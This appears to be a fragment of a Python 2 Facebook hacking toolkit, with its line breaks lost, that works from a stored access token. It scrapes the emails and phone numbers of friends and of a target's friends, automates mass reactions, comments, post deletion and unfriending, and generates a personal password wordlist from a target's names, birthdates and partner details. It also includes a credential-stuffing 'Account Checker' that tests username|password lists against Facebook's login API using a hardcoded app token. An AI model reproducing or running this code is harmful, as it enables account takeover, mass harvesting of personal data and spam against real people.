\x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def emailfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromfriends.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def nomor_hp(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = 'https://graph.facebook.com/me/friends?access_token=' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] 
An error occurred ' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def hpfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromfriends.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def menu_bot(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Bot Reactions Target Post' print '║-> \x1b[1;37;40m2. Bot Reactions Group Post' print '║-> \x1b[1;37;40m3. Bot Comment Target Post' print '║-> \x1b[1;37;40m4. Bot Comment Group Post' print '║-> \x1b[1;37;40m5. Mass Delete Post' print '║-> \x1b[1;37;40m6. Accept Friend Requests' print '║-> \x1b[1;37;40m7. Unfriends' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' bot_pilih() def bot_pilih(): bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if bots == '': print '\x1b[1;91m[!] Can\'t empty' bot_pilih() else: if bots == '1': menu_react() else: if bots == '2': grup_react() else: if bots == '3': bot_komen() else: if bots == '4': grup_komen() else: if bots == '5': deletepost() else: if bots == '6': accept() else: if bots == '7': unfriend() else: if bots == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found' bot_pilih() def menu_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. \x1b[1;97mLike' print '║-> \x1b[1;37;40m2. \x1b[1;97mLove' print '║-> \x1b[1;37;40m3. \x1b[1;97mWow' print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha' print '║-> \x1b[1;37;40m5. \x1b[1;97mSad' print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' react_pilih() def react_pilih(): global tipe aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Can\'t empty' react_pilih() else: if aksi == '1': tipe = 'LIKE' react() else: if aksi == '2': tipe = 'LOVE' react() else: if aksi == '3': tipe = 'WOW' react() else: if aksi == '4': tipe = 'HAHA' react() else: if aksi == '5': tipe = 'SAD' react() else: if aksi == '6': tipe = 'ANGRY' react() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found' react_pilih() def react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') try: oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksi.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def grup_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. \x1b[1;97mLike' print '║-> \x1b[1;37;40m2. \x1b[1;97mLove' print '║-> \x1b[1;37;40m3. \x1b[1;97mWow' print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha' print '║-> \x1b[1;37;40m5. \x1b[1;97mSad' print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' reactg_pilih() def reactg_pilih(): global tipe aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Can\'t empty' reactg_pilih() else: if aksi == '1': tipe = 'LIKE' reactg() else: if aksi == '2': tipe = 'LOVE' reactg() else: if aksi == '3': tipe = 'WOW' reactg() else: if aksi == '4': tipe = 'HAHA' reactg() else: if aksi == '5': tipe = 'SAD' reactg() else: if aksi == '6': tipe = 'ANGRY' reactg() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found' reactg_pilih() def reactg(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] try: oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksigrup.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def bot_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komen.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def grup_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] 
\x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komengrup.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def deletepost(): os.system('clear') try: toket = open('login.txt', 'r').read() nam = requests.get('https://graph.facebook.com/me?access_token=' + toket) lol = json.loads(nam.text) nama = lol['name'] except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...') print 52 * '\x1b[1;97m\xe2\x95\x90' asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket) asus = json.loads(asu.text) for p in asus['data']: id = p['id'] piro = 0 url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket) ok = json.loads(url.text) try: error = ok['error']['message'] print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed' except TypeError: print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved' piro += 1 except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Connection Error' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def accept(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket) friends = json.loads(r.text) if '[]' in str(friends['data']): print '\x1b[1;91m[!] 
No friends request' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in friends['data']: gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket) a = json.loads(gas.text) if 'error' in str(a): print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed' print 52 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def unfriend(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;97mStop \x1b[1;91mCTRL+C' print try: pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(pek.text) for i in cok['data']: nama = i['name'] id = i['id'] requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket) print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id except IndexError: pass except KeyboardInterrupt: print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def lain(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Write Status' print '║-> \x1b[1;37;40m2. Make Wordlist' print '║-> \x1b[1;37;40m3. Account Checker' print '║-> \x1b[1;37;40m4. List Group' print '║-> \x1b[1;37;40m5. Profile Guard' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' pilih_lain() def pilih_lain(): other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if other == '': print '\x1b[1;91m[!] Can\'t empty' pilih_lain() else: if other == '1': status() else: if other == '2': wordlist() else: if other == '3': check_akun() else: if other == '4': grupsaya() else: if other == '5': guard() else: if other == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found' pilih_lain() def status(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ') if msg == '': print '\x1b[1;91m[!] 
Can\'t empty' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket) op = json.loads(res.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id'] raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def wordlist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah' print 52 * '\x1b[1;97m\xe2\x95\x90' a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ') file = open(a + '.txt', 'w') b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ') c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ') d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ') e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') f = e[0:2] g = e[2:4] h = e[4:] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v' i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ') j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ') k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') l = k[0:2] m = k[2:4] n = k[4:] file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k)) wg = 0 while wg < 100: wg = wg + 1 file.write(a + str(wg) + '\n') en = 0 while en < 100: en = en + 1 file.write(i + str(en) + '\n') word = 0 while word < 100: word = word + 1 file.write(d + str(word) + '\n') gen = 0 while gen < 100: gen = gen + 1 file.write(j + str(gen) + '\n') file.close() time.sleep(1.5) print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except IOError as e: print '\x1b[1;91m[!] 
Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def check_akun(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password' print 52 * '\x1b[1;97m\xe2\x95\x90' live = [] cek = [] die = [] try: file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ') list = open(file, 'r').readlines() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for meki in list: username, password = meki.strip().split(str(pemisah)) url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = requests.get(url) mpsh = json.loads(data.text) if 'access_token' in mpsh: live.append(password) print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password elif 'www.facebook.com' in mpsh['error_msg']: cek.append(password) print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password else: die.append(password) print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def grupsaya(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' 